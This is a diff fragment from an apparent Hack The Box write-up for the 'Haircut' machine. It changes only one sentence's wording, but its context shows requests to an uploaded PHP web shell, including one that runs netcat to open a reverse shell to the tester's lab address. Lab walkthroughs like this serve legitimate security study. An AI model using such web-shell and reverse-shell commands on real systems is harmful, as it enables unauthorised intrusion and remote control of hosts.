Kyuu-Ji/htb-write-up/haircut/write-up-haircut.md

 GET /uploads/shell.php?cmd=whoami HTTP/1.1
 ```

-This works and we can send a command to start a reverse shell on the box.
+This works and it is possible to send a command to start a reverse shell on the box.
 ```markdown
 GET /uploads/shell.php?cmd=nc -e /bin/sh 10.10.14.23 9001 HTTP/1.1
 ```